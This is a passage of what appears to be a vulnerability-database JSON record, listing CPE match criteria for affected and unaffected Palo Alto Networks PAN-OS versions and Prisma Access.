riteriaId":"E49419C4-9AFE-4B7F-90EF-DB50EBB608D3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h2:*:*:*:*:*:*","matchCriteriaId":"60CE628F-C4CB-4342-8D71-DE61A089B612"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h3:*:*:*:*:*:*","matchCriteriaId":"2447D2B1-A145-4036-B9F2-17648B193465"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h4:*:*:*:*:*:*","matchCriteriaId":"C24353AF-DC81-49B9-9132-9EEC8E6009BB"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h5:*:*:*:*:*:*","matchCriteriaId":"B4420489-AE0F-4A48-B2CE-C165BEBFA6A2"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.13:h7:*:*:*:*:*:*","matchCriteriaId":"C45D8DF1-9483-4B24-AB94-B1FF4A5F2606"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.14:*:*:*:*:*:*:*","matchCriteriaId":"941CB947-862C-4C17-A039-8CD46D21B3BA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.15:*:*:*:*:*:*:*","matchCriteriaId":"146BFB2E-5802-495E-B20D-9783B41357A2"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.16:-:*:*:*:*:*:*","matchCriteriaId":"BC38A9CD-CDB6-423A-BE8D-2E0E45A3B239"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.16:h1:*:*:*:*:*:*","matchCriteriaId":"41B48ECA-FD05-4EA2-B1C9-771624EAAFF4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.16:h4:*:*:*:*:*:*","matchCriteriaId":"4D65D1F0-323E-41AF-962E-1F9741748A76"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.16:h6:*:*:*:*:*:*","matchCriteriaId":"D5D41E00-D517-4B81-A7FC-C8E101884807"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.17:*:*:*:*:*:*:*","matchCriteriaId":"8A30968E-901A-49AE-94B0-C44A5257AADB"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.18:-:*:*:*:*:*:*","matchCriteriaId":"19604659-570D-4766-B8B5-8B9920E2607F"},{"vulnerable":true,"criteria":"cpe:2.3:o:pa
loaltonetworks:pan-os:10.2.18:h1:*:*:*:*:*:*","matchCriteriaId":"745A3A2A-73CF-4DC2-968B-ACFC66389E11"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.18:h5:*:*:*:*:*:*","matchCriteriaId":"3A1E533E-DE4A-4F2F-A71A-FFF56E757087"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.0:*:*:*:*:*:*:*","matchCriteriaId":"CB628D07-9AB0-4C19-8DA3-DBE5689A3F40"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.1:*:*:*:*:*:*:*","matchCriteriaId":"3A94EA8A-EADF-416D-AE54-3CF56214714C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:*:*:*:*:*:*:*","matchCriteriaId":"BC05CBD3-7679-4640-9BE4-FD5418D9F756"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:*:*:*:*:*:*:*","matchCriteriaId":"7F383C3D-0C7A-4B5E-9798-D1CE9632687B"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:-:*:*:*:*:*:*","matchCriteriaId":"DF83EAA1-49E1-4AD0-A049-F1B3065950BC"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h1:*:*:*:*:*:*","matchCriteriaId":"BE3F7369-9F35-409A-9F47-45A959592DFA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h13:*:*:*:*:*:*","matchCriteriaId":"FD701663-4C57-4115-BD59-9DFFB504E2AF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h15:*:*:*:*:*:*","matchCriteriaId":"82816C09-6A9D-4AB2-AA55-62CC714CCA82"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h16:*:*:*:*:*:*","matchCriteriaId":"9AA9F77D-BC9C-4A2C-8988-6DEE65CD9C8E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h17:*:*:*:*:*:*","matchCriteriaId":"A5A3CEBF-9F8A-47F9-A302-7C395F2A8146"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h18:*:*:*:*:*:*","matchCriteriaId":"A79B51D2-74E8-4BA3-AE33-829A9C1776E9"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h25:*:*:*:*:*:*","matchCriteriaId":"E08297B1-95E9-4730-B59D-252B958C419
9"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h27:*:*:*:*:*:*","matchCriteriaId":"B56B153E-8693-4257-9E33-38904A949ED8"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h32:*:*:*:*:*:*","matchCriteriaId":"A220ED95-5E1A-45AA-85BD-8A58CFC6C697"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h4:*:*:*:*:*:*","matchCriteriaId":"E9DB4DA9-2262-4E9E-B3A1-49D261D01295"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h7:*:*:*:*:*:*","matchCriteriaId":"4852E738-990C-4DD2-8252-D4625D843A99"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h9:*:*:*:*:*:*","matchCriteriaId":"CB2C59F8-2583-4510-90F8-500F8329AFFD"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.5:*:*:*:*:*:*:*","matchCriteriaId":"7C31ACD7-46AB-4092-89F3-7B4C9B642199"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:-:*:*:*:*:*:*","matchCriteriaId":"52C50A07-F4D8-4F1F-BA61-3429BB1721BE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h1:*:*:*:*:*:*","matchCriteriaId":"9D12FF27-C186-467C-8627-1284EBC67243"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h10:*:*:*:*:*:*","matchCriteriaId":"AF4AA997-35BC-4BC1-9EF2-644503B2D806"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h14:*:*:*:*:*:*","matchCriteriaId":"12EF4DDF-9773-4B02-8FF4-F94A1D49E6AA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h17:*:*:*:*:*:*","matchCriteriaId":"8FAE17BB-7938-41D0-8D62-46F829C647BC"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h19:*:*:*:*:*:*","matchCriteriaId":"6DA5A0AD-C4FB-4210-8651-F94F2875A0EA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h2:*:*:*:*:*:*","matchCriteriaId":"45D633D7-A4B5-4D68-9BAB-D9BA25877F36"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h20:*:*:*:*:*:*","matc
hCriteriaId":"B79DB477-A907-4300-A651-16F93880B049"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h21:*:*:*:*:*:*","matchCriteriaId":"AF74D8FA-677F-484D-9338-A1761614FFD6"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h22:*:*:*:*:*:*","matchCriteriaId":"F9FC5118-4056-4E22-A1F0-D6FFA2B88472"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h23:*:*:*:*:*:*","matchCriteriaId":"5E7A808F-F52F-4786-950C-591CCADB2EE4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h25:*:*:*:*:*:*","matchCriteriaId":"0CA82012-AA59-44C1-BB9D-0B28764D507E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h29:*:*:*:*:*:*","matchCriteriaId":"27233F80-A620-42D3-927D-4FCDE6345456"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h3:*:*:*:*:*:*","matchCriteriaId":"63729FA6-ED2A-4593-9436-232F282A0A78"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h4:*:*:*:*:*:*","matchCriteriaId":"F39792EF-61B5-4874-9FD0-7544F8C5C0D4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h5:*:*:*:*:*:*","matchCriteriaId":"CCC24BCD-E508-4553-9BAC-468A1078C9A2"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h6:*:*:*:*:*:*","matchCriteriaId":"4A06B6F4-DCAE-4115-93D4-25D0A37AAB9F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h7:*:*:*:*:*:*","matchCriteriaId":"91529C45-FA55-4844-A153-682F729F440D"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.7:-:*:*:*:*:*:*","matchCriteriaId":"64B56778-2698-493D-80AD-B4AE81F48124"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.7:h1:*:*:*:*:*:*","matchCriteriaId":"0A9D3E2E-BA37-4F2A-BD43-97DD93E43D08"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.7:h2:*:*:*:*:*:*","matchCriteriaId":"9DCE8F6C-541E-4C61-ABC8-4A618B0DD58D"},{"vulnerable":true,"criteria":"cpe:2.3:o:palo
altonetworks:pan-os:11.1.7:h4:*:*:*:*:*:*","matchCriteriaId":"1E5EF79B-1A25-4AAB-AF2E-D151359E7FFE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.8:*:*:*:*:*:*:*","matchCriteriaId":"7193CCDA-D5D4-41D2-A808-87EDC19F2F49"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.9:*:*:*:*:*:*:*","matchCriteriaId":"D58FF578-775A-4BC0-9975-2C8B8E51B1E1"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:-:*:*:*:*:*:*","matchCriteriaId":"A92886DF-C989-47AD-8F68-8F468BBC6E57"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h1:*:*:*:*:*:*","matchCriteriaId":"9893920B-A00E-4890-A897-EE1CF0751BA0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h10:*:*:*:*:*:*","matchCriteriaId":"D1289923-12D8-4FDD-B18B-C52516F14922"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h12:*:*:*:*:*:*","matchCriteriaId":"AFC923D7-672D-4556-8344-BBD285324067"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h21:*:*:*:*:*:*","matchCriteriaId":"E1510DE9-04A3-4E08-872D-C0F6041BCFCD"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h4:*:*:*:*:*:*","matchCriteriaId":"31CD3B15-2CE0-404A-9542-9C39B8E71027"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h5:*:*:*:*:*:*","matchCriteriaId":"0194DA0B-041A-4810-8BFB-2308290517B3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h7:*:*:*:*:*:*","matchCriteriaId":"69E64D86-034F-4BC7-9A4E-2703D834EBC1"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h9:*:*:*:*:*:*","matchCriteriaId":"B992628F-1114-4FC8-9364-800ACE997044"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.11:*:*:*:*:*:*:*","matchCriteriaId":"73CF31A0-82EC-45DF-87DD-81C458AAF94C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.12:*:*:*:*:*:*:*","matchCriteriaId":"77024A63-A28F-4467-8D4C-3CFD417
24777"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.13:-:*:*:*:*:*:*","matchCriteriaId":"9223B0D4-6194-4684-8EF4-84A0EF511D8F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.13:h1:*:*:*:*:*:*","matchCriteriaId":"CB16C018-2B70-4F4D-9025-69FF82CD40F0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.13:h2:*:*:*:*:*:*","matchCriteriaId":"1259B519-130D-4584-86AA-E4EA1E89ACB2"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.13:h3:*:*:*:*:*:*","matchCriteriaId":"0DCA6D54-E623-4985-B35F-AC98299828EF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.14:-:*:*:*:*:*:*","matchCriteriaId":"20A38461-BC7E-4D75-A168-FA493955A54C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.0:*:*:*:*:*:*:*","matchCriteriaId":"AF9D96B4-E4D2-4F35-A4AF-D79BB9F3A41B"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.1:*:*:*:*:*:*:*","matchCriteriaId":"DAF8163D-1EE5-4955-A317-1BC95581C87D"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.2:*:*:*:*:*:*:*","matchCriteriaId":"AEEE3CF8-1B67-44D3-8FF1-9EC6C5197835"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.3:*:*:*:*:*:*:*","matchCriteriaId":"A6DFD05F-0A72-45E0-8D20-E1C28642C973"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:-:*:*:*:*:*:*","matchCriteriaId":"C01AD190-F3C2-4349-A063-8C5C78B725B9"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h1:*:*:*:*:*:*","matchCriteriaId":"30F4CD1C-6862-4279-8D2D-40B4D164222F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h10:*:*:*:*:*:*","matchCriteriaId":"8137F3AF-BA32-41BC-AD2E-A668FFA33892"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h11:*:*:*:*:*:*","matchCriteriaId":"8C977AF0-D2B0-401A-A7C5-A1C71AC3C072"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h12:*:*:*:*:*:*","matc
hCriteriaId":"B9C0A53F-2AFE-4B0D-AEC1-464E6001E02F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h14:*:*:*:*:*:*","matchCriteriaId":"D720448D-F40B-4C92-9101-A48AC36C9CBF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h15:*:*:*:*:*:*","matchCriteriaId":"5F12F7AC-D5B3-499E-87DA-27427D8BFFC5"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h2:*:*:*:*:*:*","matchCriteriaId":"A52B7A7A-483A-4075-B1E9-5C14B66F7FC3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h4:*:*:*:*:*:*","matchCriteriaId":"76949F0F-2ADC-492F-83F0-0A1B0E861F97"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h5:*:*:*:*:*:*","matchCriteriaId":"C1DD83BC-4E8E-4C1D-80C7-A6209B4E70CE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h6:*:*:*:*:*:*","matchCriteriaId":"73888909-64C5-41BC-BAE0-BD9BDEEAF723"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h7:*:*:*:*:*:*","matchCriteriaId":"E7861D82-815D-4894-9E11-1B6B1E66CDEC"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h8:*:*:*:*:*:*","matchCriteriaId":"D269E33D-9A79-40CC-B79A-C9A398AB7AFE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h9:*:*:*:*:*:*","matchCriteriaId":"9762E441-856F-466F-812C-798CA2EEF965"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.5:*:*:*:*:*:*:*","matchCriteriaId":"0EF09924-12F7-4F76-9FD0-08AF707AA289"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.6:*:*:*:*:*:*:*","matchCriteriaId":"C62D458B-2BC0-4E0C-8E95-894674DBD791"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:-:*:*:*:*:*:*","matchCriteriaId":"0A25C9D9-BC83-49AE-BEE7-EF05F8336B01"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h1:*:*:*:*:*:*","matchCriteriaId":"A93C2B58-EC78-4C3D-89FF-35D9C489E39F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloalton
etworks:pan-os:11.2.7:h10:*:*:*:*:*:*","matchCriteriaId":"A32E35C0-913E-4348-8AD4-E1F169C40C92"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h11:*:*:*:*:*:*","matchCriteriaId":"39112398-2A93-4E26-A7DF-0E3FA81C5130"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h12:*:*:*:*:*:*","matchCriteriaId":"C88442D1-599F-411D-B7A2-E17AA839F177"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h13:*:*:*:*:*:*","matchCriteriaId":"B3B538CC-6EA0-4555-B828-18A55997F454"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h2:*:*:*:*:*:*","matchCriteriaId":"D12C3EB6-842E-4378-896C-FDBB2BC75D10"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h3:*:*:*:*:*:*","matchCriteriaId":"86B41903-FF08-454D-B626-184CB73B122E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h4:*:*:*:*:*:*","matchCriteriaId":"396DC378-7716-40F6-88A4-99299A16CAF1"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h7:*:*:*:*:*:*","matchCriteriaId":"5E5C6E3A-262C-4212-B21C-00E8079AA8CF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h8:*:*:*:*:*:*","matchCriteriaId":"4C855108-D3C9-4DE3-B9F4-9735A0A439AF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.8:*:*:*:*:*:*:*","matchCriteriaId":"5B887380-062F-45B2-9F25-861227E86377"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.9:*:*:*:*:*:*:*","matchCriteriaId":"02713C77-26D8-4C84-A8B2-86B6BA5BE600"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:-:*:*:*:*:*:*","matchCriteriaId":"051673AB-50BF-4DD0-8679-F5825520241A"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h1:*:*:*:*:*:*","matchCriteriaId":"BAC15D8A-83CA-413F-BA2B-17EC2B169F6E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h2:*:*:*:*:*:*","matchCriteriaId":"70B3EB0C-87F1-46C2-B95C-C5808E473BD2"},{"
vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h3:*:*:*:*:*:*","matchCriteriaId":"073BF631-451B-4DFC-B23C-F0F68C2450F0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h4:*:*:*:*:*:*","matchCriteriaId":"13AA1BEF-F2F6-4534-89F3-DF4E79217978"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h5:*:*:*:*:*:*","matchCriteriaId":"CBFDE611-4981-4D92-ABAF-858DF132535F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h6:*:*:*:*:*:*","matchCriteriaId":"AAEA66F4-81AC-49C3-81B1-65EF5F16951A"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.11:-:*:*:*:*:*:*","matchCriteriaId":"CE68AC6C-61B6-4245-96AE-3D1F96D44721"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.2:*:*:*:*:*:*:*","matchCriteriaId":"7A116B32-5798-47EC-A22D-D3E960B29C07"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.3:*:*:*:*:*:*:*","matchCriteriaId":"F1725F67-BF14-48B4-A405-1CCA507CD553"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.4:-:*:*:*:*:*:*","matchCriteriaId":"8C1ADE94-3F05-48EE-94E0-FD6EB682705C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.4:h2:*:*:*:*:*:*","matchCriteriaId":"F727C18E-1C8D-448A-954C-073294FBC65C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.4:h3:*:*:*:*:*:*","matchCriteriaId":"7E492BE6-EB2E-4616-85EA-3B389741301B"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.4:h5:*:*:*:*:*:*","matchCriteriaId":"E5F85240-989D-4E2D-B2D0-F0F35E0590A4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.5:*:*:*:*:*:*:*","matchCriteriaId":"FB597850-D759-4062-974D-C33B1BA62BE3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.6:*:*:*:*:*:*:*","matchCriteriaId":"1507AE7A-A685-464F-BB0F-1868244A36C8"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":
"cpe:2.3:a:paloaltonetworks:prisma_access:-:*:*:*:*:*:*:*","matchCriteriaId":"FFB6FBC7-DEEB-4571-BCF9-92345A4B614A"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*","versionStartIncluding":"10.2.0","versionEndExcluding":"10.2.10","matchCriteriaId":"ECC53672-829D-4995-A75A-CE8D3C38A3A3"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*","versionStartIncluding":"11.2.0","versionEndExcluding":"11.2.7","matchCriteriaId":"A589C841-0E91-4A4E-9A90-8000C4AAB8EE"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:-:*:*:*:*:*:*","matchCriteriaId":"03C5ABF2-8C53-4376-8A64-6CB34E18E77C"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h10:*:*:*:*:*:*","matchCriteriaId":"FF7FCD8B-80DF-4004-A9D2-4EE884F089A6"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h12:*:*:*:*:*:*","matchCriteriaId":"83C9637A-B615-4CC2-84AA-BDCFE611484C"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h14:*:*:*:*:*:*","matchCriteriaId":"224270A7-767D-433B-AD51-C031506747C1"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h17:*:*:*:*:*:*","matchCriteriaId":"A532EFC6-A883-4279-8C05-9CD600B3F963"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h18:*:*:*:*:*:*","matchCriteriaId":"F4F20C02-DF90-4609-9254-B765481C83E0"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h2:*:*:*:*:*:*","matchCriteriaId":"872BC747-512A-4872-AC86-E7F1DC589F47"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h21:*:*:*:*:*:*","matchCriteriaId":"E5E36C87-E01D-49DC-AB73-10E5EE27F596"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h27:*:*:*:*:*:*","matchCriteriaId":"39437442-B24D-492F-B637-2203492327FC"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h3:*:*:*:*:*:*
","matchCriteriaId":"67F527D0-F85B-4B83-AEA5-BA636FC89210"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h30:*:*:*:*:*:*","matchCriteriaId":"984BE1FB-ADB7-4831-AEDD-39DBAED078B0"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h31:*:*:*:*:*:*","matchCriteriaId":"AF2C954D-9763-41E3-A132-F83C82E79BC0"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h4:*:*:*:*:*:*","matchCriteriaId":"6CF8F985-7E51-49E6-857A-FAAF027F5611"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h5:*:*:*:*:*:*","matchCriteriaId":"B437DCEA-ABA3-41CA-B320-97EC430F1122"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h7:*:*:*:*:*:*","matchCriteriaId":"593AFE7A-CB37-4156-A2B8-646A317F3176"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h9:*:*:*:*:*:*","matchCriteriaId":"A9F032C2-3202-479B-8C70-277F6871A4A4"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:-:*:*:*:*:*:*","matchCriteriaId":"0A25C9D9-BC83-49AE-BEE7-EF05F8336B01"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h1:*:*:*:*:*:*","matchCriteriaId":"A93C2B58-EC78-4C3D-89FF-35D9C489E39F"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h10:*:*:*:*:*:*","matchCriteriaId":"A32E35C0-913E-4348-8AD4-E1F169C40C92"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h11:*:*:*:*:*:*","matchCriteriaId":"39112398-2A93-4E26-A7DF-0E3FA81C5130"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h12:*:*:*:*:*:*","matchCriteriaId":"C88442D1-599F-411D-B7A2-E17AA839F177"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h2:*:*:*:*:*:*","matchCriteriaId":"D12C3EB6-842E-4378-896C-FDBB2BC75D10"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h3:*:*:*:*:*:*","matchCriteriaId":"86B41903-FF08-454D-B626-184CB73B122E"},{"vulnerable":false
